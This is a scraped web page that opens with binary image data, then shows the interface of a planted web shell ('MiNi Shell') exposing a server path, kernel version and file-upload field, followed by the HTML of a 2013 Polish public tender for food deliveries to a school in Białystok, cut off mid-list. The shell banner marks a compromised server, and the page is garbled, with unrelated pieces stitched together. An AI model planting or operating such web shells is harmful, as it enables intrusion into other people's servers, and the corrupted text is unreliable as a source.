JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130704/133261-N-2013.html

<p class="kh_header"><b>Białystok: Dostawa artykułów żywieniowych w roku szkolnym 2013/2014 
dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku.</b><br>
<b>Numer ogłoszenia: 133261 - 2013; data zamieszczenia: 04.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II , ul. Łagodna 10, 15-757 Białystok, woj. podlaskie, tel. 085 6644680, faks 085 6540049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsi1.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywieniowych w roku szkolnym 2013/2014 
dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiot zamówienia w zakresie zadania nr 1 dotyczy pieczywa i wyrobów cukierniczych:
1.Bułka tarta 500g	300 kg
2.Bułka słodka z budyniem 60g	2 000 szt.
3.Bułka słodka z marmoladą 60g	2 000 szt.
4.Bułka słodka z serem 60g	2 000 szt.
5.Bułka zwykła 50g	3 000 szt
6.Chleb biały	3 000 szt.	
7.Chleb razowy	2 000 szt.
8.Pączek	2 000 szt.

2)	Przedmiot zamówienia w zakresie zadania nr 2 dotyczy mięsa i wyrobów mięsnych:

1.Boczek pieczony b/k	80 kg	Zgodnie z PN-A-82009
2.Boczek świeży b/ż	400 kg	Zgodnie z PN-A-82009
3.Boczek wędzony	200 kg	Zgodnie z PN-A-82009
4.Filet z indyka	1 800 kg	Zgodnie z PN-A-86522
5.Filet z kurczaka	1 500 kg	Zgodnie z PN-A-86522
6.Gulasz wieprzowy surowy	1 500 kg	Zgodnie z PN-A-82011
7.Karkowina b/k	1 500 kg	Zgodnie z PN-A-82009
8.Kiełbasa biała parzona drobiowa	500 kg	Zgodnie z PN-A-86526
9.Kiełbasa biała wieprzowa surowa	200 kg	Zgodnie z PN-A-82009
10.Kiełbasa biała wieprzowa parzona	200 kg	Zgodnie z PN-A-82009
11.Kiełbasa podwawelska	800 kg	Zgodnie z PN-A-82009
12.Kiełbasa swojska, nie krótsza niż 15 cm	1 000 kg	Zgodnie z PN-A-82009
13.Kiełbasa toruńska	600 kg	Zgodnie z PN-A-82009
14.Kiełbasa złota	400 kg	Zgodnie z PN-A-82009
15.Kości karkowe	700 kg	Zgodnie z PN-A-82009
16.Kurczak świeży	1 000 kg	Zgodnie z PN-A-86522
17.Krzyżówka wieprzowa obrobiona	500 kg	Zgodnie z PN-A-82009
18.Łopatka wieprzowa b/k	2 500 kg	Zgodnie z PN-A-82009
19.Łopatka wieprzowa z/k	500 kg	Zgodnie z PN-A-82009
20.Łopatka wołowa b/k	600 kg	Zgodnie z PN-A-82009
21.Mięsień trójgłowy	500 kg	Zgodnie z PN-A-82009
22.Mięsień czterogłowy	800 kg	Zgodnie z PN-A-82009
23.Mięso mielone wieprzowe	1 000 kg	PN-1996/A-82011
24.Mięso mielone wieprzowo-wołowe	800 kg	PN-1996/A-82011
25.Mięso wieprzowe kl. II	500 kg	Zgodnie z PN-A-82009
26.Parówki typu śląskie kl. I	800 kg	Zgodnie z PN-A-86526
27.Podudzie z kurczaka	800 kg	Zgodnie z PN-92/A-86521
28.Porcje rosołowe	400 kg	Zgodnie z PN-92/A-86521
29.Schab wieprzowy b/k	2 000 kg	Zgodnie z PN-A-82009
30.Schab wieprzowy z/k	500 kg	Zgodnie z PN-A-82009
31.Szynka wieprzowa b/k kl. I (bitki)	1 000 kg	Zgodnie z PN-A-82009
32.Szynka wieprzowa b/k kl. II (gulasz)	700 kg	Zgodnie z PN-A-82009
33.Szynka wieprzowa b/k kl. III (kotlet mielony)	500 kg	Zgodnie z PN-A-82009
34.Szynka wieprzowa z/k	300 kg	Zgodnie z PN-A-82009
35.Udziec wołowy b/k	800 kg	Zgodnie z PN-A-82009
36.Udziec z kurczaka świeży	1 900 kg	Zgodnie z PN-A-86522
37.Wątróbka drobiowa	300 kg	PN-A-86523:1995
38.Wątroba wieprzowa	300 kg	PN-86/A-82004
39.Wołowina b/k kl. I	400 kg	Zgodnie z PN-A-82009
40.Wołowina b/k kl. II	400 kg	Zgodnie z PN-A-82009
41.Wołowina b/k kl. III	400 kg	Zgodnie z PN-A-82009
42.Żeberka wieprzowe pasy	100 kg	Zgodnie z PN-A-82009
43.Żołądki drobiowe	300 kg	Zgodnie z PN-A-86522

3)	Przedmiot zamówienia w zakresie zadania nr 3 dotyczy mrożonek:

1.Fasolka szparagowa 450g	500 szt.	PN-A-78601
2.Filet z mintaja	200 kg	PN-A-86759:1994
3.Filet z miruna	800 kg	PN-A-86759:1994
4.Filet z morszczuka	700 kg	PN-A-86759:1994
5.Filet z tilapii	500 kg	Zgodny z Normą Polską
6.Filet zapiekany z serem	200 kg	Zgodny z Normą Polską
7.Frytka 2,5 kg	500 szt.	PN-A-82201:1996
8.Kalafior 450g	600 szt.	PN-A-78602:1996
9.Kartacze	400 kg	PN-A-82201:1996
10Knedle owocowe, mrożone (opak. 0,45 - 3kg) 	400 kg	PN-A-82201:1996
11.Kompot wieloowocowy 450g	1 000szt.	PN-A-78608
12.Kostka rybna panierowana	400 kg	PN-A-86755:1991
13.Kotlet cordon blue 1 kg	600 kg	Zgodny z Normą Polską
14.Lody kubek, różne smaki	2 500 szt.	PN-A-86431:1999
15.Leczo 450 g	500 szt.	Zgodny z Normą Polską
16.Mieszanka kompotowa 450 kg	800 szt.	PN-A-78608
17.Mieszanka warzywna 7-składnikowa 450g	900 szt.	PN-A-78608:1997
18.Mieszanka warzywna 8-składnikowa 450g	500 szt.	PN-A-78608:1997
19.Naleśnik z serem 1 kg	1 000 kg	Zgodny z Normą Polską
20.Paluszki rybne z fileta	600 kg	PN-A-86769:1997
21.Pierogi ruskie (opak. 0,5 - 2,5 kg)	400 kg	PN-A-82201
22.Pierogi z kapustą i grzybami, mrożone	300 kg	PN-A-82201
23.Pierogi z truskawkami, mrożone	300 kg	PN-A-82201
24.Placki ziemniaczane	900 kg	PN-A-82201:1996
25.Pyzy z mięsem	200 kg	PN-A-82201:1996
26.Pyzy ziemniaczane	200 kg	PN-A-82201:1996
27.Śledź solony matias	100 kg	PN-A-86780
28.Śledź marynowany matias	100 kg	PN-A-86780
29.Truskawka 450g	1 200 szt.	PN-A-78652:1997
30.Wiśnia b/p 450g	1 000 szt.	PN-A-78653:1997

4)	Przedmiot zamówienia w zakresie zadania nr 4 dotyczy artykułów spożywczych:

1.Baton typu Kinder bueno lub równoważny nie mniejszy niż 43g	2 000 szt.	PN-A-88112:1998
2.Baton typu Lion lub równoważny nie mniejszy niż 43g	1 000 szt.	PN-A-88112:1998
3.Baton typu Milky Way lub równoważny	2 000 szt.	Zgodny z Normą Polską
4.Baton typu Snickers lub równoważny nie mniejszy niż 51g	2 000 szt.	PN-A-88112:1998
5.Baton typu Nestle Cini Minis lub równoważny nie mniejszy niż 25g	2 000 szt.	PN-A-88112:1998
6.Bomboniera Toffifee lub równoważny nie mniejszy 125g	800 szt.	PN-A-88112:1998
7.Brzoskwinie w syropie nie mniejsze niż 850 ml	800 szt.	PN-A-77610
8.Chrzan nie mniejszy niż 290g	600 szt.	PN-92/R-75353
9.Ciastka typu Pieguski lub równoważne nie mniejsze niż 135 g	1 500 szt.	PN-A-88109:1998
10.Cukier nie mniejszy niż 1 kg	2 500 kg	PN-A-74850:1996
11.Cukier puder nie mniejszy niż 400g	100 szt.	PN-A-74850:1996
12.Cukier waniliowy nie mniejszy niż 32g	300 szt.	PN-A-86946
13.Cynamon mielony nie mniejszy niż 15g	150 szt.	Zgodny z Normą Polską
14.Czekolada typu Alpen Gold lub równoważna nie mniejsza niż 100g	2 000 szt.	PN-A-88102:1998
15.Czekolada tylu goplana lub równoważna nie mniejsza niż 100g	2 000 szt.	PN-A-88102:1998
16.Czekolada typu Wedel lub równoważna nie mniejsza niż 100g	2 000 szt.	PN-A-88102:1998
17.Czekolada typu Baron lub równoważna nie mniejsza niż 100g	2 000 szt.	PN-A-88102:1998
18.Czosnek granulowany nie mniejszy niż 16g	880 szt.	PN-A-86967:1998
19.Delikat do drobiu typu Knorr lub równoważny nie mniejszy niż 600g	50 szt.	Zgodny z Normą Polską
20.Delikat do mięs typu Knorr lub równoważny nie mniejszy niż 700g	50 szt.	Zgodny z Normą Polską
21.Groszek konserwowy nie mniejszy niż 400g typu Vinegret lub równoważny	350 szt.	PN-76/A-77803
22.Herbata typu Lipton lub równoważna saszetki 100x2g	300 szt.	PN-ISO3720:1997
23.Herbata granulowana typu Lipton lub równoważna nie mniejsza niż 100 g	200 szt.	PN-ISO3720:1997
24.Herbata liściasta typu Lipton lub równoważna nie mniejsza niż 100g	200 szt.	PN-ISO3720:1997
25.Herbatniki typu Jeżyki lub równoważne nie mniejsze niż 140g	3 000 szt.
26.Jajka typu Kinder lub równoważne nie mniejsze niż 20g	2 500 szt.	Zgodny z Normą Polską
27.Kasza gryczana nie mniejsza niż 500g	500 szt.	PN-76/A-74204
28.Kasza jęczmienna gruboziarnista, średnia nie mniejsza niż 500g	2 000 szt.	PN-87/A-74203
29.Kasza jęczmienna pęczak nie mniejsza niż 500g	500 szt.	PN-A-74202
30.Kasza manna nie mniejsza niż 500g	160 szt.	PN-87-A-74203
31.Ketchup ł/p nie mniejszy niż 500g typu Pudliszki lub równoważny	540 szt.	PN-A-86951
32.Koncentrat buraczany nie mniejszy niż 300ml typu Krakus lub równoważny	20 l	PN-A-77805:1997
33.Koncentrat pomidorowy nie mniejszy niż 1 kg typu Dawtona lub równoważny	120 kg	PN-75/A-77601
34.Kukurydza konserwowa nie mniejsza niż 425g typu Vernet lub równoważny	400 szt.	PN-81/A-79734
35.Kwasek cytrynowy nie mniejszy niż 20g	800 szt.	PN-81/A-79734
36.Liść laurowy nie mniejszy niż 10g	500 szt.	BN-67/3132-10
37.Liść laurowy nie mniejszy niż 12g	200 szt.	BN-67/3132-10
38.Liść laurowy nie mniejszy niż 5g	200 szt.	BN-67/3132-10
39.Lizak typu Chupa Chups lub równoważny	2 000 szt.	Zgodny z Normą Polską
40.Majeranek nie mniejszy niż 10g	80 szt.	PN-A-96958:1997
41.Majeranek nie mniejszy niż 20g	300 szt.	PN-A-96958:1997
42.Majonez nie mniejszy niż 320ml typu Winiary lub równoważny	500 szt.
43.Majonez nie mniejszy niż 2,85 kg typu Winiary lub równoważny	200 szt.	PN-A-86950:1995
44.Majonez nie mniejszy niż 400 ml typu Winiary lub równoważny	200 szt.	PN-A-86950:1995
45.Makaron kolanka nie mniejszy niż 1 kg typu Barilla lub równoważny	2 000 kg	PN-A-74131:1999
46.Makaron spaghetti nie mniejszy niż 1 kg typu Lubella lub równoważny	800 kg	PN-87/A-74131
47.Makaron świder nie mniejszy niż 1 kg typu Barilla lub równoważny	2 000 kg	PN-A-74131:1999
48.Mąka luksusowa nie mniejsza niż 1 kg	800 kg	PN-A-74022
49.Mąka tortowa nie mniejsza niż 1 kg	600 kg	PN-A-74022
50.Mąka ziemniaczana nie mniejsza niż 1 kg	200 kg	PN-93/A-74710
51.Miód pasieka wielokwiatowy nie mniejszy niż 400g	70 kg	PN-88/A-77626
52.Musztarda chrzanowa nie mniejsza niż 190g typu Agrovita lub równoważna	400 szt.	PN-A-86964
53.Napój herbaciany nie mniejszy niż 300g	100 szt.	Zgodny z Normą Polską
54.Napój herbaciany cytrynowy nie mniejszy niż 300g	100 szt.	Zgodny z Normą Polską
55.Napój nie mniejszy niż 400 ml typu Kubuś play lub równoważny	2 000 szt.	Zgodny z Normą Polską
56.Ogórek konserwowy nie mniejszy 
niż 900 ml	800 szt.	PN-75-A-77801
57.Olej nie mniejszy niż 1l typu Kujawski lub równoważny	25 000 szt.	PN-86/A-86908
58.Ocet spirytusowy 10% nie mniejszy niż 500 ml	50 szt.	PN-EN 13188
59.Pieprz naturalny mielony nie mniejszy niż 20g typu Prymat lub równoważny	580 szt.	PN-A-86965:1997
60.Pieprz ziołowy mielony nie mniejszy niż 20g typu Prymat lub równoważny	500 szt.	PN-A-86952:1997
61.Pieprz ziołowy mielony nie mniejszy niż 15g typu Prymat lub równoważny	400 szt.	PN-A-86952:1997
62.Płatki owsiane nie mniejsze niż 500g	100 szt.	PN-82/A-74037
63.Przecier ogórkowy nie mniejszy niż 300g	600 szt.	PN-A-77701:1997
64.Przyprawa do mięs i grilla nie mniejsza niż 1,1 kg typu maggi lub równoważna	30 szt.	PN-86/A-9400
65.Przyprawa do mięsa mielonego nie mniejsza niż 20g	200 szt.	PN-A-86967:1998
66.Przyprawa do mięsa mielonego nie mniejsza niż 30g	80 szt.	PN-A-86967:1998
67.Przyprawa do ryb typu Prymat lub równoważna nie mniejsza niż 20g	80 szt.	PN-A-86967:1998
68.Przyprawa typu Jarzynka lub równoważna nie mniejsza niż 2,8 kg	120 szt.	PN-A-79008
69.Przyprawa prowansalska nie mniejsza niż 10g	300 szt.	PN-A-86967:1998
70.Przyprawa sypka nie mniejsza niż 1 kg typu Vegetta lub równoważna	1 500 kg	Zgodny z Normą Polską
71.Przyprawa typu Vegeta lub równoważna 200g	300 szt.	Zgodny z Normą Polską
72.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza 200g	500 szt.	PN-A-86967:1998
73.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza niż 960 ml	40 szt.	PN-A-86967:1998
74.Pulpa pomidorowa nie mniejsza niż 3kg	30 szt.	Zgodny z Normą Polską
75.Rodzynki nie mniejsze niż 150g	100 szt.	Zgodny z Normą Polską
76.Rogalik typu Chipita 7 days lub równoważny nie mniejszy niż 65g	4 000 szt.	Zgodny z Normą Polską
77.Rosół drobiowy typu Winiary lub równoważny nie mniejszy niż 2,2 kg	30 kg	Zgodny z Normą Polską
78.Ryż biały typu Sonko lub równoważny nie mniejszy niż 1 kg	500 kg	PN-A-74220:1997
79.Sekret szefa drobiowy typu Maggi lub równoważny nie mniejszy niż 800 g	20 kg	PN-A-86967:1998
80.Sekret szefa grzybowy typu Maggi lub równoważny nie mniejszy niż 650g	15 kg	PN-A-86967:1998
81.Sekret szefa typu Maggi lub równoważny wołowy nie mniejszy niż 900g	25 kg	PN-A-86967:1998
82.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1 kg	30 kg	PN-A-86951:1997
83.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1,1 kg	30 kg	PN-A-86951:1997
84.Sos demi glace typu Winiary lub równoważny nie mniejszy niż 900 g	30 kg	PN-A-86951:1997
85.Sos grzyby leśne typu Winiary lub równoważny nie mniejszy niż 900g	30 kg	PN-A-86951:1997
86.Sos myśliwski typu Winiary lub równoważny nie mniejszy niż 900 g	30 kg	PN-A-86951:1997
87.Sos pieczeniowy typu Winiary lub równoważny nie mniejszy niż 1,1 kg	35 kg	PN-A-86951:1997
88.Sos sałatkowy typu Winiary lub równoważny nie mniejszy niż 900 g	30 kg	PN-A-86951:1997
89.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 350 ml	140 l	PN-A-86951:2006
90.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 520 ml	120 l	PN-A-86951:2006
91.Sól jodowana typu Cenos lub równoważna nie mniejsza niż 1 kg	700 kg	PN-C-84081-2:1998
92.Syrop mix typu Herbapol lub równoważny nie mniejszy niż 420 ml	1 000 szt.	PN-A-94012:1998
93.Syrop mix typu Paola lub równoważny nie mniejszy niż 430 ml	1 000 szt.	PN-A-94012:1998
94.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 300g	400 szt.	PN-A-77807
95.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 900g	100 szt.	PN-A-77807
96.Wafel typu Pronce Polo XXL lub równoważny 52g	1 000 szt.	Zgodny z Normą Polską
97.Zając wielkanocny 30g	800 szt.	Zgodny z Normą Polską
98.Zaprawa cytrynowa nie mniejsza niż 300 ml	100 szt.	PN-A-79036:1997
99.Ziele angielskie nie mniejsze niż 15 g	900 szt.	BN-67/8132-14
100.Zupa barszcz biały typu Winiary lub równoważna nie mniejsza niż 900 g	70 szt.	PN-A-75980:1997
101.Zupa borowikowa typu Winiary lub równoważna nie mniejsza niż 900g	40 szt.	PN-A-75980:1997
102.Zupa cebulowa typu Winiary lub równoważna nie mniejsza 900g	30 szt.	PN-A-75980:1997
103.Zupa ogonowa typu Winiary lub równoważna nie mniejsza niż 900g	80 szt.	PN-A-75980:1997
104.Zupa żurek typu Winiary lub równoważna nie mniejsza niż 900g	30 szt.	PN-A-75980:1997
105.Zestaw świąteczny 145g	1 000 szt.	Zgodny z Normą Polską

5)	Przedmiot zamówienia w zakresie zadania nr 5 dotyczy nabiału:

1.Drożdże świeże nie mniejsze niż 100g	200 szt.	Zgodny z Normą Polską
2.Jogurt polski pitny różne smaki nie mniejszy niż 400g	2 000 szt.	PN-A-86061
3.Jogurt polski pitny różne smaki nie mniejszy niż 250g	2 000 szt.	PN-A-86061
4.Masło śmietankowe nie mniejsze niż 200g	1 200 szt.	PN-A-86155:1995
5.Masło polskie nie mniejsze niż 200g	1 200 szt.	PN-A-86155:1995
6.Masło typu Łaciate nie mniejsze niż 200g	1 200 szt.	PN-A-86155:1995
7.Mleko 3/2% UHT w kartonie, nie mniejsze niż 1l	1 500 szt.	Zgodny z Normą Polską
8.Mleko świeże typu Twój kubek 2% w kartonie, nie mniejsze niż 1l	1 200 szt.	Zgodny z Normą Polską
9.Ser żółty typu Gouda lub równoważny	250 kg	PN-68/A-86230
10.Śmietana nie mniejsza niż 0,2 l	500 szt.	PN-A-86050
11.Śmietana gęsta 18% nie mniejsza niż 400 ml	4 400 szt.	PN-A-86050
12.Śmietana UHT 18% nie mniejsza niż 375 ml	200 szt.	Zgodny z Normą Polską
13.Twaróg mielony w wiadrze nie mniejszy niż 1 kg	500 kg	Zgodny z Normą Polską
14.Twaróg półtłusty krajanka	500 g	PN-91-A-86300

6)	Przedmiot zamówienia w zakresie zadania nr 6 dotyczy warzyw i owoców:

1.Banan	3 500 kg	PN-ISO 931:1999
2.Brzoskwinia	2 000 kg	PN-R-75526:1996
3.Burak	2 000 kg	PN-72-R-75360
4.Cebula 	1 900 kg	PN-87/R-75357
5.Cytryna	200 kg	PN-ISO 3631:1999
6.Czereśnia	500 kg	PN-72/R-75027
7.Czosnek świeży	5 kg	PN-R-75518:1996
8.Fasola	500 kg	PN-75/R-65031
9.Groch połówki	500 kg	PN-81/R-65032
10.Gruszka	1 800 kg	PN-73/R-75025
11.Jabłko	1 900 kg	PN-84/R-75024
12.Jaja	1 300 kg	PN-85/A-86503
13.Kalafior	200 kg	PN-72/R-75361
14.Kapusta biała	1 500 kg	PN-85/R-75362
15.Kapusta biała młoda	500 kg	PN-85/R-75362
16.Kapusta czerwona	1 000 kg	PN-85/R-75359
17.Kapusta kiszona	1 400 kg	PN-72/A-77700
18.Kapusta pekińska	500 kg	PN-R-75544
19.Kapusta włoska	800 kg	PN-72/R-75362
20.Kiwi	1 800 kg	PN/R-75546
21.Koper	900 pęczków	PN-R-75381
22.Mandarynka	1 500 kg	PN-ISO-7563:2004
23.Marchew	5 500 kg	PN-84/R-75358
24.Nektarynka	1 200 kg	PN-R-75526:1996
25.Ogórek gruntowy	400 kg	Zgodny z Normą Polską
26.Ogórek kiszony	1 200 kg	PN-A-7770
27.Ogórek małosolny	800 kg	Zgodny z Normą Polską
28.Ogórek świeży	1 600 kg	PN-85/R-75359
29.Papryka	800 kg	PN-75/R-75078
30.Pieczarka	900 kg	PN-75/R-75078
31.Pietruszka	1 500 kg	PN-75/R-75078
32.Pietruszka natka	900 pęczków	PN-R-75381
33.Pomarańcza	3 000 kg	PN-ISO-7563:2004
34.Pomidor	1 200 kg	PN-91/R-75368
35.Pomidor malinowy	500 kg	PN-91/R-75368
36.Por	700 kg	PN-R-75521:1996
37.Rzodkiew biała sopel	800 kg	PN-R-75383:1996
38.Rabarbar świeży	300 kg	PN-R-75540:1996
39.Rzodkiewka	800 pęczków	Zgodny z Normą Polską
40.Sałata	400 kg	PN-R-75522:1996
41.Seler	1 900 kg	PN-85/R-75359
42.Szczypior	300 pęczków	PN-92/R-75415
43.Śliwka	500 kg	PN-73/R-75026
44.Truskawka	300 kg	PN-R-75535:1996
45.Winogrono jasne	600 kg	PN-R-75519:1996
46.Winogrono ciemne	600 kg	PN-R-75519:1996
47.Wiśnia	500 kg	PN-725/R-75028
48.Ziemniak	46 000 kg	PN-75/R-74450
49.Ziemniaki młode	4 000 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczeni</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

